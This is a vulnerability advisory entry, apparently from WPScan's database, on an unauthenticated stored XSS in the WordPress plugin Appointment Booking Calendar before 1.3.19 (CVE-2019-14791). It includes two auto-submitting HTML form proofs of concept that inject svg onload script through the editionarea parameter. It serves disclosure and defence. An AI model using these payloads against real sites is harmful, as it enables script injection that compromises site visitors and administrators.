Lucene search
WpvulndbWPEX-ID:2F204527-D11B-4B7A-8A57-95DBB8E69D6DHistoryJul 04, 2019 - 12:00 a.m.
Appointment Booking Calendar < 1.3.19 - Unauthenticated Stored XSS
2019-07-0400:00:00
wpvulndb
12
0.001 Low
EPSS
Percentile
38.0%
Lack of authorisation check in the cpabc_appointments_save_edition() function can lead to stored XSS via the editionarea parameter when cfwpp_edit is set to ‘js’ or ‘css’
<body onload="document.forms[0].submit();">
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="CP_ABC_post_edition" value=""/>
<input type="hidden" name="cfwpp_edit" value="js"/>
<input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/>
</form>
</body>
<body onload="document.forms[0].submit();">
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="CP_ABC_post_edition" value=""/>
<input type="hidden" name="cfwpp_edit" value="css"/>
<input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/>
</form>
</body>
The payload will be triggered in all pages with a booking form.Related
cvelist
cvelist
CVE-2019-14791
2019-08-09 13:32:47
cve
cve
CVE-2019-14791
2019-08-09 14:15:11
nvd
nvd
CVE-2019-14791
2019-08-09 14:15:11
prion
prion
Design/Logic Flaw
2019-08-09 14:15:00
wpvulndb
wpvulndb
Appointment Booking Calendar < 1.3.19 - Unauthenticated Stored XSS
2019-07-04 00:00:00